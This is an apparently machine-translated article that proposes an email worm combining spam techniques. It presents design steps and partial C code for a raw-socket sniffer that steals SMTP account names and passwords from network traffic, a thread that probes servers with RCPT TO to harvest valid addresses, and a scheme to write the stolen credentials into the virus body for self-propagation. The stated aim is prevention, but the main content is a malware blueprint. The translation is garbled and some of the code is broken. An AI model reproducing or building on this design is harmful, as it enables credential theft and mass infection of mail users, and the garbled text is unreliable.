background
Virus, DDOS, spam has become three major technical problems in today's network security. The reason why anti-spam is so difficult is because the (e) SMTP protocol itself defects. Just as DDOS is the same as the deficiencies inherent in TCP / IP protocol. It should be noted that mail worms are sent to spam in order to propagate themselves.
Sobig worms in 2003 increased the number of spam, and many security experts believe that Sobig uses spam technology and predicts: the integration of worm technology and spam technology will be the future development trend. In fact, this statement is correct but not accurate, good, Sobig sent by the email independently belonging, but I love you, the HAPPYTIME virus sent by the mail is not? Only Sobig sends two times the frequency of the same email, so intercept The number of propagation is very large, but the number of true infections is not large, and Sobig has not used spam technology technology.
This article will be based on the key technologies of mail worms and spam, and propose the idea of using spam technology to spread worms. Of course, this is not to spread worms, but to better prevent such worms that may appear in the future. This article assumes that readers have already have (e) SMTP protocols, worms, and spam knowledge.
Limitations and solutions for mail worms
The 3 main issues faced by the mail worm: First, the email address collection, the second is the source of the server address, and the third is how to make the attachment as much as possible. This article only discusses the first two points:
I. Email address collection
There are two ways now popular and widely used:
Get from the WAB file
Get the WAB file path from regedit, then analyze the WAB files of known formats, read the address.
Waiting from * .ht, *. Htm, *. Html, *. Txt, *. Dbx, *. EML.
You can traverse the Internet temporary directory or traverse the hard disk, and look for addresses from the above-mentioned extensions. Method and waste
Pipeline Search HTML page is similar, is looking for mailto and @, as a sign of the legal email address.
The address of the address collected in the first method is relatively high, and the click rate will be relatively high; the second method If the address selection algorithm is rigorous, then the address found is basically a legitimate Email address, but the credibility is low. . The number of addresses collected by the two methods is quite limited, and become one of the restrictions of worm propagation. The solution will be mentioned later.
Second. The source server address and the source of the account password
Currently, almost all worms hard encode one or several server IP addresses in the file, so
The mail server is not available, the worm also stops spread, and due to the restrictions of the network security policy, many hosts of the worm cannot be connected to these specified servers, which affects the speed of the worm. A new method is proposed to get a large amount of reliable SMTP Server, account, password information.
On the Win2K platform, we can use the feature of Winsock 2, which allows the program to use WSAIOCTL () to one
Sock_raw type Socket Settings SiO_RCVALL properties so that the socket can receive all the native data, which is an easy SNIFFER that does not need to be written.
Many smart readers have thought of the next step, yes, using the original socket, the principle is as follows:
The destination port is equal to 25.
Start recording from the SYN package, which is the client and SMTP Server is being connected.
Depending on HELO or EHLO to determine if the server needs to be certified.
If it is ehlo, capture subsequent usernames and passwords
According to Mail from: get the sender
Abandon the packet sent by the worm itself to the 25-port.
If the number of captured data exceeds the upper limit, discard the current server, restore to the initial state to convenient, you can define the SMTPServinfo structure to save the server information.
Typedef struct tagsmtpserverinfo {
DWORD DWCREDIT; / / The credibility of this server information is reduced according to the delivery of the delivery
Bool bauth; // Does the server need to be certified
IN_addr dwserverip; // mail server IP
Char szusername [32]; // username
Char szpassword [32]; // password
Char szmailfrom [32]; // sender
SMTPSERVINFO;
The following CaptuRETHREAD function is the capture thread, how to work, and principles, in order to save space, the code initialized and judged successfully is omitted.
DWORD WINAPI CAPTURETHREAD (LPVOID P)
{
WSAIOCTL (CaptureSocket, SiO_RCVALL, & LPVBUFFER, ..., NULL); // Set to capture all messages
While (True)
{
MEMSET (BUF, 0, SIZEOF (BUF));
IRET = Recv (CaptureSocket, Buf, Sizeof (BUF), 0)
Pipheader = (ipheader *) BUF;
IF (iSexistip (pipheader-> destip) || pipheader-> dport! = :: htons (25)) // is not sent by worm
CONTINUE;
IF (pipheader-> th_flag & syn == SYN) / / Is it a handshake with the server?
{
BNEWUSER = true; // has a new user to send a message, start a record :-)
iStatus = 0;
DWFAILCOUNT = 0;
}
IF (bnewuser == false)
CONTINUE;
PBUF = (char *) BUF SIZEOF (Ipheader) Sizeof (TCPHEADER);
Switch (iStatus)
{
Case 0: // Handshake status
{
M_PSMTPSERVINFO = New SMTPSERVINFO;
m_psmtpservinfo-> dwcredit = 3; // The initial credibility is 3
m_psmtpservinfo-> dwserverip.s_un.s_addr = pipheader-> destip; // Get IP
ISTATUS ;
Break;
}
Case 1:
{
IF (:: strstr (PBUF, "Helo")) // Anonymous SMTP Server
{
m_psmtpservinfo-> bauth = false;
m_psmtpservinfo-> szusername [0] = NULL;
m_psmtpservinfo-> szpassword [0] = NULL;
iStatus = 5; // 2 (user), 3 (pass) jump
}
IF (: strs ") // server needs to be authenticated
{
m_psmtpservinfo-> bauth = true; istatus = 2; // Prepare to capture username and password
}
Break;
}
Case 2: // Start a collection account and password
{
IF (: strstr (PBUF, "Auth"))
ISTATUS = 3;
Break;
}
Case 3:
{
LSTRCPYN (m_psmtpservinfo-> szusername, pbuf, :: strstr (pbuf, "/ r / n") - PBUF 1);
ISTATUS = 4;
Break;
}
Case 4:
{:: lstrcpyn (m_psmtpservinfo-> szpassword, pbuf, :: strstr (pbuf, "/ r / n") - PBUF 1); iStatus = 5;
Break;
}
Case 5:
{
...
:: lstrcpyn (m_psmtpservinfo-> szmailfrom, ...);
PostthreadMessage (:: gmainthread, ..., m_psmtpservinfo); // Notify the main thread
Bnewuser = false; // Don't have to catch 25 packs, unless there is a new handshake information
iStatus = 0; // Restore to the initial state.
...
The main thread is responsible for writing this server information into the virus body, and re-coding the virion so that the accessory sent again contains the latest information; at the same time, the main thread will start a new mail address probe thread, connect this server, get as much as possible This server's account is sent itself. How to get an account will be described below.
At this point, we have completed the acquisition of the mail server and account information, and the worm will collect the latest server information. The information collected is basically the network, because the number of servers involved is very large, the range is extremely Wide, the blockacter or account is impossible, these are the advantages of the SNIFFER Capacity to obtain the server.
Key technologies for spam
Detailed technology of spam is not within the scope of this article, but for explaining problems, there must be a brief description. In general, the two issues that spam must be solved is:
1. Selection of sending mode:
Disadvantages without authentication using SMTP protocol
Use Open RELAY (open forwarding)
Open relay refers to the function of forwarding all inbound messages due to whether the mail server is ignoring whether the mail sender or the mail recipient is set by the system.
Express
Express delivery uses this unit to serve as a function of the sender, parse the IP address of the receiving server by DNS, and then connect the unit directly to the receiving server, send mail directly to the recipient's recipient. Foxmail's "Express" is this principle. Now, express delivery has gradually invalidated, and SMTP Server, which is high, does not allow direct transmission of non-SMTP Server to avoid being utilized by spammer.
Self-built SMTP server
Spammer builds its own SMTP server, directly connects to the target server, and sends an email. This situation does not require an anonymous server and the help of the forwarding server. The target server has no reason to reject a request from a mail server, so it can always guarantee the success of the message, the disadvantage is that the domain name must be applied, and the IP and domain name must be frequently replaced because it will soon be included in blacklist.
It can be seen that the delivery technology of spam is not suitable for worms because SPAMMER can send a number of mail as long as a SMTP server is found, and an address is faded, and the worm can be replaced. Then, the students must be self-reliant, and the SNIFFER as described above is the solution. 2. Acquisition of email address
VRFY instruction
The role of this instruction is to verify that a user is a local user: Yes, return a complete address; no, then according to the SMTP settings. Spammer uses this command to match the dictionary to collect valid email addresses. In the new version of the SMTP software, this instruction has been disabled, but has not been canceled.
EXPN instruction
This instruction is used to query the mail list to the server, and then return to the list, one address per line. This instruction is also disabled in the new version of SMTP software.
Analysis page
Spammer obtains the URL through the search engine such as Google, Yahoo, etc., downloads the webpage to the local, collects the address by matching keywords "mail to:" and "@". This method is widely used because it is not available and both methods are not available. But now there is already a counterfeit measures, such as using
Virtual sender
Spammer Connect the SMTP Server through a regular step, then send Helo (EHLO), then then send RCPT TO:
The key is here, and the limitations of the number of mail worms collection address, we can use virtual sending
To solve. The image is described below:
Customer: Connect (SMTP Server)
Server: 220 SMTP.263.NET ESMTP, successful connection
Customer: Helo Localhost Ehlo Localhost
Server: 250-smtp.263.net
250-Pipelining
...
250-auth login
Customer: auth login / r / n
Server: 334 ...
Customer: Base64 encoding of username
Server loopback: 334 ...
Customer: Password Base64 encoding
Server: 235 Authentication Successful
Customer: Mail from:
Server: 250 ok
Customer: RCPT TO:
Server loopback:
? 250, STR is a legal account.
? 550, invalid user.
? 522, Too Many RCPTO.
Customer: DATA / R / N
...
The foregoing has implemented the Sniffer method to get the mail server and account information, and whether the BAUTH field flag needs to be authenticated, and now you can use SMTPServinfo to connect to the server, and probe the legal account. There is also a problem, that is, the STR source, we choose the method obtained from the local file, the principle is as follows:
Traverse the hard drive, search for files with TXT, HT *, DOC, EML, INI, etc. are extensions. Find a word, join the M_wordList list.
Follow the rules of the legal email address, find an email, join the M_Emaillist list, send the mail thread to read the M_Emaillist list and send mail.
Email Address Detection Thread (Emailspam) reads the M_WordList list, verifying if it is an legal account, is added to M_EMAILLSIT.
Both M_WordList and M_Emaillist have a certain number and record mutually exclusive to reduce the possibility of sending multiple emails to the same E-mail address.
Nowadays, a lot of STR can be detected according to the (e) SMTP protocol, and the detection thread emailspamer is as follows:
While (True)
{
m_smtp.talkwithsmtpserver ();
DO
{
INT IRET = m_smtp.sendrcptto (szrcptto); // szrcptto from M_WordList
IF (IRET == 250) / / The representative is successful, there is indeed this account
:: m_emaillist-> add (szrcptto);
ELSE IF (IRet == 550) // Account is wrong, sleep for a while, avoid being sealed
Sleep (100);
ELSE / / error, disconnection, re-detection
Break;
} while (:: m_wordlist-> getcount ());
...
At this point, our ideas are very clear:
After the worm runs, start the file traversal thread, get a lot of words from the file, add M_WordList, add the mail address obtained from the file to M_Emaillist. The address detection thread first uses the existing server information in the virus. The word is taken from M_WordList. For the successful Word, this Word server domain name constitutes the form of Word@xxx.YYY to add M_Emaillist. Send a mail thread to read M_Emaillist sends a message. Monitor thread capture and analyze network packets, add new server resources, and write viral body. In this way, the source-source constant email address should be negligent, and the worm is proliferated.
It should be noted that the big mail service provider is usually good Anti-SPAM feature, and if the RCPT TO error reaches a maximum, then this account will be deactivated for a while. However, the larger size, the more registered accounts, and randomly find a word, basically all legal accounts. For small mail service providers, the security is very poor, and the number of RCPT TO is not limited. In the final analysis, no matter whether it is sealed, the number of visual mail addresses have been discovered, and the worm is sent to these addresses.
Conclude
Network security issues are only thoroughly solved when all computer users become security experts. In fact, this is impossible, and we can't rely on or waiting for the level of computers. It is currently available, and countries have been working hard, just accelerate anti-spam legislation and standard mail providers. China Anti-Spam Association has adopted a series of powerful measures this year, including publishing spam servers blacklists, formulating mail service specifications, promoting spam legislation, etc., although these worms that combine spam technology cannot be completely contained, they have certain Restrictive effect.
